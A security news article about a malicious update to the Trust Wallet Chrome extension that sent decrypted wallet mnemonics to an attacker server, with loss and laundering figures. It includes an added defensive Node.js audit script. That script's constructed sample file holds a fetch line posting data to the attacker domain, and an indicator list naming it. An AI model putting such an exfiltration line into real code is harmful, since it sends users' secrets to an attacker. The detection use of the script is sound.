$7 Million Crypto Loss: Malicious Code Breaches Trust Wallet Chrome Extension


Dec 26, 2025 | Ravie Lakshmanan | Cryptocurrency / Incident Response

Trust Wallet Users Advised to Update Following Security Breach

Trust Wallet is alerting its users to update the Google Chrome extension after a significant security breach that has resulted in an estimated loss of around $7 million. This incident specifically affects version 2.68 of the extension, which boasts a user base of approximately one million, according to the Chrome Web Store. Users are urged to upgrade to version 2.69 immediately to protect their digital assets.

Details of the Incident

In an official announcement on X, Trust Wallet confirmed the serious nature of the breach. “We know that around $7 million has been impacted and will ensure all affected users receive refunds,” the company stated. They have prioritized support for these users and are in the final stages of the reimbursement process.

The company is also advising users to ignore any messages that do not originate from its verified channels. Importantly, those who use mobile-only versions or other browser extensions are not impacted by this incident.

How the Attack Occurred

According to a report from SlowMist, version 2.68 introduced harmful code that systematically searched through all wallets stored in the extension. This malicious code prompted users for their mnemonic phrases—a critical piece of information needed to access and control their wallets.

SlowMist explains, “The encrypted mnemonic is decrypted with the password entered during wallet unlock. Once decrypted, this sensitive information is sent to the attacker’s server at api.metrics-trustwallet.com.” Notably, this domain was registered on December 8, 2025, with activity on the server starting just weeks later, on December 21.

Stolen Assets and Their Movement

The breach initially allowed attackers to drain various digital assets, including approximately $3 million in Bitcoin, $431 in Solana, and over $3 million in Ethereum. Blockchain investigator ZachXBT has indicated that the stolen funds have been funneled through centralized exchanges and cross-chain bridges, often to obscure their source.

PeckShield’s analysis identifies that while roughly $2.8 million of the stolen assets remain in the hackers’ wallets, over $4 million has already been transferred to centralized exchanges. Specifically, about $3.3 million went to ChangeNOW, around $340,000 was sent to FixedFloat, and around $447,000 reached KuCoin. This emphasizes the urgency of the situation, as it indicates effective laundering of stolen funds.

Technical Insights and Concerns

SlowMist highlighted that this backdoor incident stemmed from malicious modifications in Trust Wallet’s internal extension codebase rather than an injection through a compromised third-party dependency. The attacker manipulated the app’s own code and repurposed the existing PostHog analytics library as the exfiltration channel, sending the stolen data to a server controlled by the attacker.

The attack is viewed as sophisticated, with indications pointing to a possible nation-state actor behind it. It raises concerns that the hackers may have gained access to Trust Wallet developers’ devices or secured unauthorized deployment permissions prior to the incident.
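The two details above (the attacker’s server at api.metrics-trustwallet.com, and the reuse of an analytics library as the exfiltration path) are the kind of thing a defender can check for in an unpacked extension before trusting an update. The following Node.js script is an added example, not code from the article, SlowMist or Trust Wallet: it reads a manifest and the extension’s JavaScript files, flags the version named in the advisory, flags wildcard host permissions (which let an extension post to any origin, so the manifest gives no hint of where data goes), and lists every hostname referenced in the code that is not on an expected allowlist, with the SlowMist domain treated as a known indicator. The manifest, file contents and the allowlist hosts are constructed for the example; the analytics host and RPC host in the allowlist are assumptions, not values from the article.

```javascript
// Added example: audit an unpacked Chrome extension for outbound hosts and
// the advisory's indicators. Sample manifest/files are constructed, not real
// Trust Wallet code.

const KNOWN_BAD_VERSION = "2.68"; // version named in the Trust Wallet advisory
const KNOWN_BAD_HOSTS = new Set(["api.metrics-trustwallet.com"]); // domain reported by SlowMist

// Hypothetical allowlist: hosts this (constructed) wallet extension is expected to reach.
const EXPECTED_HOSTS = new Set(["api.example-wallet.test", "us.i.posthog.com"]);

// Captures the hostname of any http(s) URL embedded in source text.
const URL_RE = /https?:\/\/([a-z0-9.-]+\.[a-z]{2,})/gi;

function extractHosts(source) {
  const hosts = new Set();
  for (const m of source.matchAll(URL_RE)) hosts.add(m[1].toLowerCase());
  return hosts;
}

// A wildcard host permission means the manifest places no limit on where
// the extension may send data, so reviewers must rely on the code itself.
function hasBroadHostPermission(manifest) {
  const perms = manifest.host_permissions || [];
  return perms.some((p) => p === "<all_urls>" || /^(\*|https?):\/\/\*\//.test(p));
}

// Returns an ordered list of findings: {type, ...detail}.
function auditExtension(manifest, files) {
  const findings = [];
  if (manifest.version === KNOWN_BAD_VERSION) {
    findings.push({ type: "bad-version", detail: manifest.version });
  }
  if (hasBroadHostPermission(manifest)) {
    findings.push({ type: "broad-host-permission", detail: manifest.host_permissions });
  }
  for (const [name, src] of Object.entries(files)) {
    for (const host of extractHosts(src)) {
      if (KNOWN_BAD_HOSTS.has(host)) {
        findings.push({ type: "known-ioc", file: name, host });
      } else if (!EXPECTED_HOSTS.has(host)) {
        findings.push({ type: "unexpected-host", file: name, host });
      }
    }
  }
  return findings;
}

// Constructed sample input: a manifest at the advisory's version with a
// wildcard host permission, and three source files.
const SAMPLE_MANIFEST = {
  name: "example-wallet",
  version: "2.68",
  host_permissions: ["https://*/*"],
};
const SAMPLE_FILES = {
  "background.js":
    'const beacon = "https://api.metrics-trustwallet.com/collect";\n' +
    'fetch(beacon, { method: "POST", body: payload });',
  "analytics.js": 'posthog.init(KEY, { api_host: "https://us.i.posthog.com" });',
  "rpc.js": 'const RPC = "https://api.example-wallet.test/v1";',
};

function runSample() {
  return auditExtension(SAMPLE_MANIFEST, SAMPLE_FILES);
}

console.log(JSON.stringify(runSample(), null, 2));
```

On the constructed input the audit reports three findings in order: the bad version, the wildcard host permission, and the known indicator in background.js. A real review would also diff the update against the previously published package, since the article notes the change was made inside the project’s own code rather than in a dependency, so dependency scanning alone would not have caught it.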

Speculation of Insider Involvement

Changpeng Zhao, co-founder of Binance, which holds ownership of Trust Wallet, hinted that this could potentially be the work of an insider. He noted in a discussion that the exploit was “most likely” executed by someone with internal knowledge, although no definitive evidence has been released to substantiate this claim.

As the cryptocurrency space continues to evolve, incidents like this highlight the importance of maintaining stringent security measures and ongoing vigilance from both users and developers alike.
